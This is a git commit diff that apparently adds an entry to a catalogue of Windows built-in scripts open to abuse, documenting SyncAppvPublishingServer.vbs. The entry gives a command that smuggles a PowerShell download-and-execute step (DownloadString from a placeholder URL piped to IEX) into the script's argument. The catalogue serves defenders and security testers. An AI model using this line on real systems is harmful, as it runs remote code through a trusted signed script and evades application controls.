Add SyncAppvPublishingServer.vbs
parent
b5edf3240a
commit
75399d8c55
|
@ -7,6 +7,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
|||
|
||||
[Cl_invocation.ps1](OSScripts/Cl_invocation.md)
|
||||
[Manage-bde.vbs](OSScripts/Manage-bde.md)
|
||||
[Slmgr.vbs](OSScripts/Slmgr.md)
|
||||
[Pubprn.vbs](OSScripts/Pubprn.md)
|
||||
[Slmgr.vbs](OSScripts/Slmgr.md)
|
||||
[Syncappvpublishingserver.vbs(OSScripts/Syncappvpublishingserver.vbs)
|
||||
[Winrm.vbs](OSScripts/Winrm.md)
|
||||
|
|
|
@ -0,0 +1,28 @@
|
|||
## SyncAppvPublishingServer.vbs
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Nick Landers - @monoxgas
|
||||
* Casey Smith - @subTee
|
||||
|
||||
Code sample:
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/monoxgas/status/895045566090010624
|
||||
* https://twitter.com/subTee/status/855738126882316288
|
||||
|
||||
Full path:
|
||||
```
|
||||
C:\Windows\System32\SyncAppvPublishingServer.vbs
|
||||
```
|
||||
|
||||
Notes:
|
||||
Just like [SyncAppvPublishingServer.exe](OSBinaries/Syncappvpublishingserver.md) this starts a Powershell script with the provided arguments.
|
||||
|
||||
Included with Windows 10 Enterprise. Script is catalog signed by Microsoft.
|
||||
|
Loading…
Reference in New Issue